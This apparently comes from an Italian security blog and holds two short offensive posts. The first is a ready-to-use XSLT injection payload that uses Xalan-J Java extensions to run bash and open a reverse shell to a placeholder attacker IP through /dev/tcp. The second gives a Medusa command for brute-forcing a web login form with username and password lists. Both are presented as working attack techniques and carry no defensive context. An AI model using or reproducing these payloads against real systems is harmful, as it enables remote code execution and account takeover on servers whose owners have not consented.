11/01/13

XSLT os command execution (reverse shell)


XSLT code injection

<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:j="http://xml.apache.org/xalan/java" xmlns:runtime="xalan://java.lang.Runtime" version="1.0">
<xsl:output method="text"/>
<xsl:strip-space elements="*"/>
<xsl:variable name="rt" select="runtime:getRuntime()"/>
<xsl:variable name="unix_shell" select="'/bin/bash'"/>
<xsl:variable name="unix_option" select="'-c'"/>
<xsl:variable name="command" select="'0&lt;&amp;196;exec 196&lt;&gt;/dev/tcp/<attackerIP>/2222; sh &lt;&amp;196 &gt;&amp;196 2&gt;&amp;196'"/>
<xsl:variable name="separator" select="' ---Separator-- '"/>
<xsl:template match="/">
<xsl:variable name="tmp">
<xsl:value-of select="concat($unix_shell, $separator, $unix_option, $separator, $command)"/>
</xsl:variable>
<xsl:variable name="cmd" select="j:java.lang.String.new($tmp)"/>
<xsl:variable name="array" select="j:split($cmd, $separator)"/>
<xsl:variable name="proc" select="runtime:exec($rt, $array)"/>
</xsl:template>
</xsl:stylesheet>

Riferimenti:
http://xhe.myxwiki.org/xwiki/bin/view/XSLT/Engine_XalanJ

26/04/12

BruteForce with Medusa: web-form

Un'ottima alternativa a THC-HYDRA: Medusa

Per effettuare il brute force di un form web:
#./medusa -h [IP|host] -U file_utenze -P file_password.txt 
-M web-form -m FORM:"path/page.php" -m DENY-SIGNAL:"testo in caso di deny" 
-m FORM-DATA:"[post|get]?user=&pass=&login=login"

Il comando seguente mostra i moduli presenti e richiamabili con l'opzione "-M":
#./medusa -d